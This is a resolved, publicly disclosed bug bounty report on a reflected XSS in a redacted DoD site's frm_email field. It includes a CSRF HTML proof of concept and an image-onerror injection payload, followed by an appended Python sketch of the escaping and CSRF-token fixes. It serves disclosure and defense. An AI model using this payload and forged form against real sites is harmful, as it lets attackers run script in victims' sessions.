POST based RXSS on https://█████ via frm_email parameter

Disclosed: 2021-01-12 21:39:28 by nagli to deptofdefense
Severity: Medium
Vulnerability Details
Good Afternoon DoD team,

## Summary

I have discovered that on the following domain https://███████ there is a POST-based reflected XSS vulnerability which I can trigger with CSRF (and clickjacking) due to unsanitized input inside the `frm_email` parameter.

## Description

The vulnerable path is: https://███

## CSRF HTML code for you to reproduce

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://███" method="POST">
      <input type="hidden" name="action" value="FFEXT&#95;forgotpw" />
      <input type="hidden" name="token" value="██████████" />
      <input type="hidden" name="frm&#95;email" value="&quot;&gt;&lt;img&#32;src&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;" />
      <input type="hidden" name="frm&#95;zip5" value="NONE" />
      <input type="hidden" name="cmd&#95;submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

## Steps To Reproduce (as an attacker)

1. Navigate to https://███████
2. Enter arbitrary text in the email field and NONE in the zip field
3. Capture the request in Burp and change the payload in the email field to `"><img src onerror=alert(document.domain)>`
4. Craft a CSRF PoC and an alert will pop upon clicking. :-)

████████

## PoC Video

████

## Best Regards,

nagli

## Impact

Attacker can execute JS code on the victim's behalf.
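A defender-side illustration of the two fixes this report points at, added here and not part of nagli's report or the DoD application: encode `frm_email` for its HTML attribute context before reflecting it, and reject anti-CSRF tokens that are not the one issued to the session. The handler, the rendering and the token value are a constructed model of the form fields in the PoC, not the real application's code.

```python
import hmac
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Payload exactly as given in the report.
PAYLOAD = '"><img src onerror=alert(document.domain)>'

# Constructed POST body mirroring the PoC's form fields; the token is a placeholder.
POST_BODY = urlencode({
    "action": "FFEXT_forgotpw",
    "token": "PLACEHOLDER_TOKEN",
    "frm_email": PAYLOAD,
    "frm_zip5": "NONE",
    "cmd_submit": "Submit",
})

def parse_form(body: str) -> dict:
    """application/x-www-form-urlencoded body -> {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def render_vulnerable(form: dict) -> str:
    """Reflects frm_email into an attribute unescaped: the bug class reported."""
    email = form.get("frm_email", "")
    return f'<input type="text" name="frm_email" value="{email}">'

def render_fixed(form: dict) -> str:
    """Encodes for the attribute context; quote=True also escapes " and '."""
    email = html.escape(form.get("frm_email", ""), quote=True)
    return f'<input type="text" name="frm_email" value="{email}">'

def csrf_token_valid(session_token: str, form: dict) -> bool:
    """Hypothetical check: the submitted token must equal the one issued to this
    session, so a token copied into a cross-site form (as in the PoC) fails."""
    submitted = form.get("token", "")
    return bool(submitted) and hmac.compare_digest(session_token, submitted)

class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.names = []
    def handle_starttag(self, tag, attrs):
        self.names.append(tag)

def injected_tags(rendered: str) -> list:
    """Start tags a browser would see besides the expected <input>; non-empty means breakout."""
    parser = _Tags()
    parser.feed(rendered)
    return [t for t in parser.names if t != "input"]
```

`injected_tags` returns `['img']` for the vulnerable rendering and `[]` for the fixed one, which is the check a regression test for this report would assert.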
Report Stats
  • Report ID: 996535
  • State: Closed
  • Substate: resolved
  • Upvotes: 3